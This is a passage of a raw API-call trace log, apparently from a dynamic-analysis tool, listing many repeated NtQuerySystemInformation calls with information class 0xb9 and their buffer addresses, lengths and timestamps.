SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0227.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x50, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x28, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0227.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.696] NtQuerySystemInformation 